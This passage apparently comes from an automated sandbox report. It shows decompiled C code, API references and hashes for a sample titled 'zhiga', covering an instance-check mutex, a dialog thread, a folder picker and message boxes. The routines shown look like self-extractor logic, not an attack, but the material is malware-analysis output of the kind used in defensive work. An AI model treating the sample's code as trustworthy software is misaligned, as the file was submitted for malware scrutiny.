                                                          							if(E0109468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                                                          								goto L3;
                                                          							} else {
                                                          								_t43 = CreateMutexA(0, 1,  &_v268);
                                                          								 *0x1098588 = _t43;
                                                          								if(_t43 == 0 || GetLastError() != 0xb7) {
                                                          									goto L12;
                                                          								} else {
                                                          									if(( *0x1099a34 & 0x00000080) == 0) {
                                                          										_t64 = 0x524;
                                                          										if(E010944B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                                                          											goto L12;
                                                          										} else {
                                                          											goto L11;
                                                          										}
                                                          									} else {
                                                          										_t64 = 0x54b;
                                                          										E010944B9(0, 0x54b, "zhiga", 0, 0x10, 0);
                                                          										L11:
                                                          										CloseHandle( *0x1098588);
                                                          										 *0x1099124 = 0x800700b7;
                                                          										goto L33;
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          					} else {
                                                          						L3:
                                                          						_t64 = 0x4b1;
                                                          						E010944B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                          						 *0x1099124 = 0x80070714;
                                                          						L33:
                                                          						_t23 = 0;
                                                          					}
                                                          				}
                                                          				return E01096CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                          			}



















                                                          0x01092cb5
                                                          0x01092cbc
                                                          0x01092cc7
                                                          0x01092cc9
                                                          0x01092cd1
                                                          0x01092cd3
                                                          0x01092cd9
                                                          0x01092ce9
                                                          0x01092cf9
                                                          0x01092d0e
                                                          0x01092d15
                                                          0x01092d1c
                                                          0x01092ef3
                                                          0x00000000
                                                          0x01092d2d
                                                          0x01092d34
                                                          0x01092d3b
                                                          0x01092d40
                                                          0x01092d48
                                                          0x01092d59
                                                          0x01092d84
                                                          0x01092e1f
                                                          0x01092e1f
                                                          0x01092e2e
                                                          0x01092e41
                                                          0x01092e5a
                                                          0x01092e62
                                                          0x01092e6c
                                                          0x01092e6c
                                                          0x01092e75
                                                          0x01092e77
                                                          0x01092e77
                                                          0x01092e84
                                                          0x01092e8b
                                                          0x01092e94
                                                          0x00000000
                                                          0x01092e96
                                                          0x01092e96
                                                          0x01092e9e
                                                          0x01092ea2
                                                          0x01092eba
                                                          0x00000000
                                                          0x01092ece
                                                          0x01092ede
                                                          0x01092eed
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x01092eed
                                                          0x01092eef
                                                          0x01092eef
                                                          0x01092eef
                                                          0x01092eef
                                                          0x01092ea2
                                                          0x01092e86
                                                          0x01092e88
                                                          0x01092e88
                                                          0x01092e43
                                                          0x01092e48
                                                          0x00000000
                                                          0x01092e48
                                                          0x01092e30
                                                          0x01092e30
                                                          0x01092ef8
                                                          0x01092f01
                                                          0x00000000
                                                          0x01092f01
                                                          0x01092d8a
                                                          0x01092d8f
                                                          0x01092da1
                                                          0x00000000
                                                          0x01092da3
                                                          0x01092dae
                                                          0x01092db4
                                                          0x01092dbb
                                                          0x00000000
                                                          0x01092dca
                                                          0x01092dd3
                                                          0x01092df5
                                                          0x01092e02
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x01092dd5
                                                          0x01092dde
                                                          0x01092de3
                                                          0x01092e04
                                                          0x01092e0a
                                                          0x01092e10
                                                          0x00000000
                                                          0x01092e10
                                                          0x01092dd3
                                                          0x01092dbb
                                                          0x01092da1
                                                          0x01092d5b
                                                          0x01092d5b
                                                          0x01092d5d
                                                          0x01092d69
                                                          0x01092d6e
                                                          0x01092f06
                                                          0x01092f06
                                                          0x01092f06
                                                          0x01092d59
                                                          0x01092f18

                                                          APIs
                                                          • memset.MSVCRT ref: 01092CD9
                                                          • memset.MSVCRT ref: 01092CE9
                                                          • memset.MSVCRT ref: 01092CF9
                                                            • Part of subcall function 0109468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010946A0
                                                            • Part of subcall function 0109468F: SizeofResource.KERNEL32(00000000,00000000,?,01092D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010946A9
                                                            • Part of subcall function 0109468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010946C3
                                                            • Part of subcall function 0109468F: LoadResource.KERNEL32(00000000,00000000,?,01092D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010946CC
                                                            • Part of subcall function 0109468F: LockResource.KERNEL32(00000000,?,01092D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010946D3
                                                            • Part of subcall function 0109468F: memcpy_s.MSVCRT ref: 010946E5
                                                            • Part of subcall function 0109468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010946EF
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 01092D34
                                                          • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 01092D40
                                                          • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 01092DAE
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 01092DBD
                                                          • CloseHandle.KERNEL32(zhiga,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 01092E0A
                                                            • Part of subcall function 010944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 01094518
                                                            • Part of subcall function 010944B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 01094554
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                          • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$zhiga
                                                          • API String ID: 1002816675-3407794480
                                                          • Opcode ID: 3d4e1799dc951a63954435f7dbaed0f599b9ccc6c1e3ec85fed5c82c8685250c
                                                          • Instruction ID: 681bc160b347398e4aae36712cfa038d9973bfa265ca3e4ebf15c50fd0368791
                                                          • Opcode Fuzzy Hash: 3d4e1799dc951a63954435f7dbaed0f599b9ccc6c1e3ec85fed5c82c8685250c
                                                          • Instruction Fuzzy Hash: DB51E6B0340305BAFF7066299D79B7A36D8F795714F00406EB6C1C62C9DABD8841A755
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 81%
                                                          			E010934F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                          				void* _t9;
                                                          				void* _t12;
                                                          				void* _t13;
                                                          				void* _t17;
                                                          				void* _t23;
                                                          				void* _t25;
                                                          				struct HWND__* _t35;
                                                          				struct HWND__* _t38;
                                                          				void* _t39;
                                                          
                                                          				_t9 = _a8 - 0x10;
                                                          				if(_t9 == 0) {
                                                          					__eflags = 1;
                                                          					L19:
                                                          					_push(0);
                                                          					 *0x10991d8 = 1;
                                                          					L20:
                                                          					_push(_a4);
                                                          					L21:
                                                          					EndDialog();
                                                          					L22:
                                                          					return 1;
                                                          				}
                                                          				_push(1);
                                                          				_pop(1);
                                                          				_t12 = _t9 - 0xf2;
                                                          				if(_t12 == 0) {
                                                          					__eflags = _a12 - 0x1b;
                                                          					if(_a12 != 0x1b) {
                                                          						goto L22;
                                                          					}
                                                          					goto L19;
                                                          				}
                                                          				_t13 = _t12 - 0xe;
                                                          				if(_t13 == 0) {
                                                          					_t35 = _a4;
                                                          					 *0x1098584 = _t35;
                                                          					E010943D0(_t35, GetDesktopWindow());
                                                          					__eflags =  *0x1098184; // 0x1
                                                          					if(__eflags != 0) {
                                                          						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                                                          						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                                                          					}
                                                          					SetWindowTextA(_t35, "zhiga");
                                                          					_t17 = CreateThread(0, 0, E01094FE0, 0, 0, 0x1098798);
                                                          					 *0x109879c = _t17;
                                                          					__eflags = _t17;
                                                          					if(_t17 != 0) {
                                                          						goto L22;
                                                          					} else {
                                                          						E010944B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                                                          						_push(0);
                                                          						_push(_t35);
                                                          						goto L21;
                                                          					}
                                                          				}
                                                          				_t23 = _t13 - 1;
                                                          				if(_t23 == 0) {
                                                          					__eflags = _a12 - 2;
                                                          					if(_a12 != 2) {
                                                          						goto L22;
                                                          					}
                                                          					ResetEvent( *0x109858c);
                                                          					_t38 =  *0x1098584; // 0x0
                                                          					_t25 = E010944B9(_t38, 0x4b2, 0x1091140, 0, 0x20, 4);
                                                          					__eflags = _t25 - 6;
                                                          					if(_t25 == 6) {
                                                          						L11:
                                                          						 *0x10991d8 = 1;
                                                          						SetEvent( *0x109858c);
                                                          						_t39 =  *0x109879c; // 0x0
                                                          						E01093680(_t39);
                                                          						_push(0);
                                                          						goto L20;
                                                          					}
                                                          					__eflags = _t25 - 1;
                                                          					if(_t25 == 1) {
                                                          						goto L11;
                                                          					}
                                                          					SetEvent( *0x109858c);
                                                          					goto L22;
                                                          				}
                                                          				if(_t23 == 0xe90) {
                                                          					TerminateThread( *0x109879c, 0);
                                                          					EndDialog(_a4, _a12);
                                                          					return 1;
                                                          				}
                                                          				return 0;
                                                          			}












                                                          0x010934fb
                                                          0x010934fe
                                                          0x01093665
                                                          0x01093666
                                                          0x01093666
                                                          0x01093668
                                                          0x0109366e
                                                          0x0109366e
                                                          0x01093671
                                                          0x01093671
                                                          0x01093677
                                                          0x00000000
                                                          0x01093677
                                                          0x01093504
                                                          0x01093506
                                                          0x01093507
                                                          0x0109350c
                                                          0x0109365b
                                                          0x0109365f
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x01093661
                                                          0x01093512
                                                          0x01093515
                                                          0x010935be
                                                          0x010935c1
                                                          0x010935d1
                                                          0x010935d8
                                                          0x010935de
                                                          0x010935f8
                                                          0x01093617
                                                          0x01093617
                                                          0x01093623
                                                          0x01093637
                                                          0x0109363d
                                                          0x01093642
                                                          0x01093644
                                                          0x00000000
                                                          0x01093646
                                                          0x01093652
                                                          0x01093657
                                                          0x01093658
                                                          0x00000000
                                                          0x01093658
                                                          0x01093644
                                                          0x0109351b
                                                          0x0109351d
                                                          0x0109354f
                                                          0x01093553
                                                          0x00000000
                                                          0x00000000
                                                          0x0109355f
                                                          0x01093565
                                                          0x0109357c
                                                          0x01093581
                                                          0x01093584
                                                          0x0109359b
                                                          0x010935a1
                                                          0x010935a7
                                                          0x010935ad
                                                          0x010935b3
                                                          0x010935b8
                                                          0x00000000
                                                          0x010935b8
                                                          0x01093586
                                                          0x01093588
                                                          0x00000000
                                                          0x00000000
                                                          0x01093590
                                                          0x00000000
                                                          0x01093590
                                                          0x01093524
                                                          0x01093535
                                                          0x01093541
                                                          0x00000000
                                                          0x01093549
                                                          0x00000000

                                                          APIs
                                                          • TerminateThread.KERNEL32(00000000), ref: 01093535
                                                          • EndDialog.USER32(?,?), ref: 01093541
                                                          • ResetEvent.KERNEL32 ref: 0109355F
                                                          • SetEvent.KERNEL32(01091140,00000000,00000020,00000004), ref: 01093590
                                                          • GetDesktopWindow.USER32 ref: 010935C7
                                                          • GetDlgItem.USER32(?,0000083B), ref: 010935F1
                                                          • SendMessageA.USER32(00000000), ref: 010935F8
                                                          • GetDlgItem.USER32(?,0000083B), ref: 01093610
                                                          • SendMessageA.USER32(00000000), ref: 01093617
                                                          • SetWindowTextA.USER32(?,zhiga), ref: 01093623
                                                          • CreateThread.KERNEL32 ref: 01093637
                                                          • EndDialog.USER32(?,00000000), ref: 01093671
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                          • String ID: zhiga
                                                          • API String ID: 2406144884-3705506974
                                                          • Opcode ID: edb7441c46861828c6e5a39dde9bc11aa0c4606e6817b393c994218fe125c0ea
                                                          • Instruction ID: 1c0a6091f38f82e6c919c94f7bd6ec36b2f19c0a042a296ca7d80f93571e1207
                                                          • Opcode Fuzzy Hash: edb7441c46861828c6e5a39dde9bc11aa0c4606e6817b393c994218fe125c0ea
                                                          • Instruction Fuzzy Hash: 9531AA71244315FBDF701F39AC7DE2A3EA5F789B45F10851AF6C29A298C67A8400DF54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 50%
                                                          			E01094224(char __ecx) {
                                                          				char* _v8;
                                                          				_Unknown_base(*)()* _v12;
                                                          				_Unknown_base(*)()* _v16;
                                                          				_Unknown_base(*)()* _v20;
                                                          				char* _v28;
                                                          				intOrPtr _v32;
                                                          				intOrPtr _v36;
                                                          				intOrPtr _v40;
                                                          				char _v44;
                                                          				char _v48;
                                                          				char _v52;
                                                          				_Unknown_base(*)()* _t26;
                                                          				_Unknown_base(*)()* _t28;
                                                          				_Unknown_base(*)()* _t29;
                                                          				_Unknown_base(*)()* _t32;
                                                          				char _t42;
                                                          				char* _t44;
                                                          				char* _t61;
                                                          				void* _t63;
                                                          				char* _t65;
                                                          				struct HINSTANCE__* _t66;
                                                          				char _t67;
                                                          				void* _t71;
                                                          				char _t76;
                                                          				intOrPtr _t85;
                                                          
                                                          				_t67 = __ecx;
                                                          				_t66 = LoadLibraryA("SHELL32.DLL");
                                                          				if(_t66 == 0) {
                                                          					_t63 = 0x4c2;
                                                          					L22:
                                                          					E010944B9(_t67, _t63, 0, 0, 0x10, 0);
                                                          					return 0;
                                                          				}
                                                          				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                                                          				_v12 = _t26;
                                                          				if(_t26 == 0) {
                                                          					L20:
                                                          					FreeLibrary(_t66);
                                                          					_t63 = 0x4c1;
                                                          					goto L22;
                                                          				}
                                                          				_t28 = GetProcAddress(_t66, 0xc3);
                                                          				_v20 = _t28;
                                                          				if(_t28 == 0) {
                                                          					goto L20;
                                                          				}
                                                          				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                                                          				_v16 = _t29;
                                                          				if(_t29 == 0) {
                                                          					goto L20;
                                                          				}
                                                          				_t76 =  *0x10988c0; // 0x0
                                                          				if(_t76 != 0) {
                                                          					L10:
                                                          					 *0x10987a0 = 0;
                                                          					_v52 = _t67;
                                                          					_v48 = 0;
                                                          					_v44 = 0;
                                                          					_v40 = 0x1098598;
                                                          					_v36 = 1;
                                                          					_v32 = E01094200;
                                                          					_v28 = 0x10988c0;
                                                          					 *0x109a288( &_v52);
                                                          					_t32 =  *_v12();
                                                          					if(_t71 != _t71) {
                                                          						asm("int 0x29");
                                                          					}
                                                          					_v12 = _t32;
                                                          					if(_t32 != 0) {
                                                          						 *0x109a288(_t32, 0x10988c0);
                                                          						 *_v16();
                                                          						if(_t71 != _t71) {
                                                          							asm("int 0x29");
                                                          						}
                                                          						if( *0x10988c0 != 0) {
                                                          							E01091680(0x10987a0, 0x104, 0x10988c0);
                                                          						}
                                                          						 *0x109a288(_v12);
                                                          						 *_v20();
                                                          						if(_t71 != _t71) {
                                                          							asm("int 0x29");
                                                          						}
                                                          					}
                                                          					FreeLibrary(_t66);
                                                          					_t85 =  *0x10987a0; // 0x0
                                                          					return 0 | _t85 != 0x00000000;
                                                          				} else {
                                                          					GetTempPathA(0x104, 0x10988c0);
                                                          					_t61 = 0x10988c0;
                                                          					_t4 =  &(_t61[1]); // 0x10988c1
                                                          					_t65 = _t4;
                                                          					do {
                                                          						_t42 =  *_t61;
                                                          						_t61 =  &(_t61[1]);
                                                          					} while (_t42 != 0);
                                                          					_t5 = _t61 - _t65 + 0x10988c0; // 0x2131181
                                                          					_t44 = CharPrevA(0x10988c0, _t5);
                                                          					_v8 = _t44;
                                                          					if( *_t44 == 0x5c &&  *(CharPrevA(0x10988c0, _t44)) != 0x3a) {
                                                          						 *_v8 = 0;
                                                          					}
                                                          					goto L10;
                                                          				}
                                                          			}




























                                                          0x01094234
                                                          0x0109423c
                                                          0x01094240
                                                          0x010943b2
                                                          0x010943b7
                                                          0x010943c0
                                                          0x00000000
                                                          0x010943c5
                                                          0x0109424c
                                                          0x01094252
                                                          0x01094257
                                                          0x010943a4
                                                          0x010943a5
                                                          0x010943ab
                                                          0x00000000
                                                          0x010943ab
                                                          0x01094263
                                                          0x01094269
                                                          0x0109426e
                                                          0x00000000
                                                          0x00000000
                                                          0x0109427a
                                                          0x01094280
                                                          0x01094285
                                                          0x00000000
                                                          0x00000000
                                                          0x0109428d
                                                          0x01094293
                                                          0x010942e6
                                                          0x010942e9
                                                          0x010942ef
                                                          0x010942f4
                                                          0x010942f7
                                                          0x01094300
                                                          0x01094307
                                                          0x0109430e
                                                          0x01094315
                                                          0x0109431c
                                                          0x01094322
                                                          0x01094326
                                                          0x0109432d
                                                          0x0109432d
                                                          0x0109432f
                                                          0x01094334
                                                          0x01094343
                                                          0x01094349
                                                          0x0109434d
                                                          0x01094354
                                                          0x01094354
                                                          0x0109435d
                                                          0x0109436e
                                                          0x0109436e
                                                          0x0109437d
                                                          0x01094383
                                                          0x01094387
                                                          0x0109438e
                                                          0x0109438e
                                                          0x01094387
                                                          0x01094391
                                                          0x01094399
                                                          0x00000000
                                                          0x01094295
                                                          0x0109429f
                                                          0x010942a5
                                                          0x010942aa
                                                          0x010942aa
                                                          0x010942ad
                                                          0x010942ad
                                                          0x010942af
                                                          0x010942b0
                                                          0x010942b6
                                                          0x010942c2
                                                          0x010942c8
                                                          0x010942ce
                                                          0x010942e4
                                                          0x010942e4
                                                          0x00000000
                                                          0x010942ce

                                                          APIs
                                                          • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 01094236
                                                          • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 0109424C
                                                          • GetProcAddress.KERNEL32(00000000,000000C3), ref: 01094263
                                                          • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 0109427A
                                                          • GetTempPathA.KERNEL32(00000104,010988C0,?,00000001), ref: 0109429F
                                                          • CharPrevA.USER32(010988C0,02131181,?,00000001), ref: 010942C2
                                                          • CharPrevA.USER32(010988C0,00000000,?,00000001), ref: 010942D6
                                                          • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 01094391
                                                          • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 010943A5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                          • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                          • API String ID: 1865808269-1731843650
                                                          • Opcode ID: dc620258f5157f1c4e2c7d6691957ac7a104322094d1607a761d7f5a8ccd4ae6
                                                          • Instruction ID: 63ff4b3ea8d78cb31d360ca520b8ae456c690119af685f1a71df2070dbeb4706
                                                          • Opcode Fuzzy Hash: dc620258f5157f1c4e2c7d6691957ac7a104322094d1607a761d7f5a8ccd4ae6
                                                          • Instruction Fuzzy Hash: 8E41A574A00208AFEF215B79E8B496E7FA4FB46344F0481AAE9C1E7345C77989029774
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 94%
                                                          			E010944B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                          				signed int _v8;
                                                          				char _v64;
                                                          				char _v576;
                                                          				void* _v580;
                                                          				struct HWND__* _v584;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t34;
                                                          				void* _t37;
                                                          				signed int _t39;
                                                          				intOrPtr _t43;
                                                          				signed int _t44;
                                                          				signed int _t49;
                                                          				signed int _t52;
                                                          				void* _t54;
                                                          				intOrPtr _t55;
                                                          				intOrPtr _t58;
                                                          				intOrPtr _t59;
                                                          				int _t64;
                                                          				void* _t66;
                                                          				intOrPtr* _t67;
                                                          				signed int _t69;
                                                          				intOrPtr* _t73;
                                                          				intOrPtr* _t76;
                                                          				intOrPtr* _t77;
                                                          				void* _t80;
                                                          				void* _t81;
                                                          				void* _t82;
                                                          				intOrPtr* _t84;
                                                          				void* _t85;
                                                          				signed int _t89;
                                                          
                                                          				_t75 = __edx;
                                                          				_t34 =  *0x1098004; // 0x8a9c601
                                                          				_v8 = _t34 ^ _t89;
                                                          				_v584 = __ecx;
                                                          				_t83 = "LoadString() Error.  Could not load string resource.";
                                                          				_t67 = _a4;
                                                          				_t69 = 0xd;
                                                          				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                          				_t80 = _t83 + _t69 + _t69;
                                                          				_v580 = _t37;
                                                          				asm("movsb");
                                                          				if(( *0x1098a38 & 0x00000001) != 0) {
                                                          					_t39 = 1;
                                                          				} else {
                                                          					_v576 = 0;
                                                          					LoadStringA( *0x1099a3c, _t75,  &_v576, 0x200);
                                                          					if(_v576 != 0) {
                                                          						_t73 =  &_v576;
                                                          						_t16 = _t73 + 1; // 0x1
                                                          						_t75 = _t16;
                                                          						do {
                                                          							_t43 =  *_t73;
                                                          							_t73 = _t73 + 1;
                                                          						} while (_t43 != 0);
                                                          						_t84 = _v580;
                                                          						_t74 = _t73 - _t75;
                                                          						if(_t84 == 0) {
                                                          							if(_t67 == 0) {
                                                          								_t27 = _t74 + 1; // 0x2
                                                          								_t83 = _t27;
                                                          								_t44 = LocalAlloc(0x40, _t83);
                                                          								_t80 = _t44;
                                                          								if(_t80 == 0) {
                                                          									goto L6;
                                                          								} else {
                                                          									_t75 = _t83;
                                                          									_t74 = _t80;
                                                          									E01091680(_t80, _t83,  &_v576);
                                                          									goto L23;
                                                          								}
                                                          							} else {
                                                          								_t76 = _t67;
                                                          								_t24 = _t76 + 1; // 0x1
                                                          								_t85 = _t24;
                                                          								do {
                                                          									_t55 =  *_t76;
                                                          									_t76 = _t76 + 1;
                                                          								} while (_t55 != 0);
                                                          								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                          								_t83 = _t25 + _t74;
                                                          								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                          								_t80 = _t44;
                                                          								if(_t80 == 0) {
                                                          									goto L6;
                                                          								} else {
                                                          									E0109171E(_t80, _t83,  &_v576, _t67);
                                                          									goto L23;
                                                          								}
                                                          							}
                                                          						} else {
                                                          							_t77 = _t67;
                                                          							_t18 = _t77 + 1; // 0x1
                                                          							_t81 = _t18;
                                                          							do {
                                                          								_t58 =  *_t77;
                                                          								_t77 = _t77 + 1;
                                                          							} while (_t58 != 0);
                                                          							_t75 = _t77 - _t81;
                                                          							_t82 = _t84 + 1;
                                                          							do {
                                                          								_t59 =  *_t84;
                                                          								_t84 = _t84 + 1;
                                                          							} while (_t59 != 0);
                                                          							_t21 = _t74 + 0x64; // 0x65
                                                          							_t83 = _t21 + _t84 - _t82 + _t75;
                                                          							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                                                          							_t80 = _t44;
                                                          							if(_t80 == 0) {
                                                          								goto L6;
                                                          							} else {
                                                          								_push(_v580);
                                                          								E0109171E(_t80, _t83,  &_v576, _t67);
                                                          								L23:
                                                          								MessageBeep(_a12);
                                                          								if(E0109681F(_t67) == 0) {
                                                          									L25:
                                                          									_t49 = 0x10000;
                                                          								} else {
                                                          									_t54 = E010967C9(_t74, _t74);
                                                          									_t49 = 0x190000;
                                                          									if(_t54 == 0) {
                                                          										goto L25;
                                                          									}
                                                          								}
                                                          								_t52 = MessageBoxA(_v584, _t80, "zhiga", _t49 | _a12 | _a16);
                                                          								_t83 = _t52;
                                                          								LocalFree(_t80);
                                                          								_t39 = _t52;
                                                          							}
                                                          						}
                                                          					} else {
                                                          						if(E0109681F(_t67) == 0) {
                                                          							L4:
                                                          							_t64 = 0x10010;
                                                          						} else {
                                                          							_t66 = E010967C9(0, 0);
                                                          							_t64 = 0x190010;
                                                          							if(_t66 == 0) {
                                                          								goto L4;
                                                          							}
                                                          						}
                                                          						_t44 = MessageBoxA(_v584,  &_v64, "zhiga", _t64);
                                                          						L6:
                                                          						_t39 = _t44 | 0xffffffff;
                                                          					}
                                                          				}
                                                          				return E01096CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                                                          			}



































                                                          0x010944b9
                                                          0x010944c4
                                                          0x010944cb
                                                          0x010944d8
                                                          0x010944e4
                                                          0x010944eb
                                                          0x010944ee
                                                          0x010944ef
                                                          0x010944ef
                                                          0x010944f1
                                                          0x010944f7
                                                          0x010944f8
                                                          0x0109467b
                                                          0x010944fe
                                                          0x01094509
                                                          0x01094518
                                                          0x01094525
                                                          0x01094562
                                                          0x01094568
                                                          0x01094568
                                                          0x0109456b
                                                          0x0109456b
                                                          0x0109456d
                                                          0x0109456e
                                                          0x01094572
                                                          0x01094578
                                                          0x0109457c
                                                          0x010945cb
                                                          0x01094607
                                                          0x01094607
                                                          0x0109460d
                                                          0x01094613
                                                          0x01094617
                                                          0x00000000
                                                          0x0109461d
                                                          0x01094623
                                                          0x01094626
                                                          0x01094628
                                                          0x00000000
                                                          0x01094628
                                                          0x010945cd
                                                          0x010945cd
                                                          0x010945cf
                                                          0x010945cf
                                                          0x010945d2
                                                          0x010945d2
                                                          0x010945d4
                                                          0x010945d5
                                                          0x010945db
                                                          0x010945de
                                                          0x010945e3
                                                          0x010945e9
                                                          0x010945ed
                                                          0x00000000
                                                          0x010945f3
                                                          0x010945fd
                                                          0x00000000
                                                          0x01094602
                                                          0x010945ed
                                                          0x0109457e
                                                          0x0109457e
                                                          0x01094580
                                                          0x01094580
                                                          0x01094583
                                                          0x01094583
                                                          0x01094585
                                                          0x01094586
                                                          0x0109458a
                                                          0x0109458c
                                                          0x0109458f
                                                          0x0109458f
                                                          0x01094591
                                                          0x01094592
                                                          0x0109459b
                                                          0x0109459e
                                                          0x010945a3
                                                          0x010945a9
                                                          0x010945ad
                                                          0x00000000
                                                          0x010945af
                                                          0x010945af
                                                          0x010945bf
                                                          0x0109462d
                                                          0x01094630
                                                          0x0109463d
                                                          0x0109464e
                                                          0x0109464e
                                                          0x0109463f
                                                          0x01094640
                                                          0x01094647
                                                          0x0109464c
                                                          0x00000000
                                                          0x00000000
                                                          0x0109464c
                                                          0x01094666
                                                          0x0109466d
                                                          0x0109466f
                                                          0x01094675
                                                          0x01094675
                                                          0x010945ad
                                                          0x01094527
                                                          0x0109452e
                                                          0x0109453f
                                                          0x0109453f
                                                          0x01094530
                                                          0x01094531
                                                          0x01094538
                                                          0x0109453d
                                                          0x00000000
                                                          0x00000000
                                                          0x0109453d
                                                          0x01094554
                                                          0x0109455a
                                                          0x0109455a
                                                          0x0109455a
                                                          0x01094525
                                                          0x0109468c

                                                          APIs
                                                          • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 01094518
                                                          • MessageBoxA.USER32(?,?,zhiga,00010010), ref: 01094554
                                                          • LocalAlloc.KERNEL32(00000040,00000065), ref: 010945A3
                                                          • LocalAlloc.KERNEL32(00000040,00000065), ref: 010945E3
                                                          • LocalAlloc.KERNEL32(00000040,00000002), ref: 0109460D
                                                          • MessageBeep.USER32(00000000), ref: 01094630
                                                          • MessageBoxA.USER32(?,00000000,zhiga,00000000), ref: 01094666
                                                          • LocalFree.KERNEL32(00000000), ref: 0109466F
                                                            • Part of subcall function 0109681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0109686E
                                                            • Part of subcall function 0109681F: GetSystemMetrics.USER32(0000004A), ref: 010968A7
                                                            • Part of subcall function 0109681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 010968CC
                                                            • Part of subcall function 0109681F: RegQueryValueExA.ADVAPI32(?,01091140,00000000,?,?,0000000C), ref: 010968F4
                                                            • Part of subcall function 0109681F: RegCloseKey.ADVAPI32(?), ref: 01096902
                                                          Strings
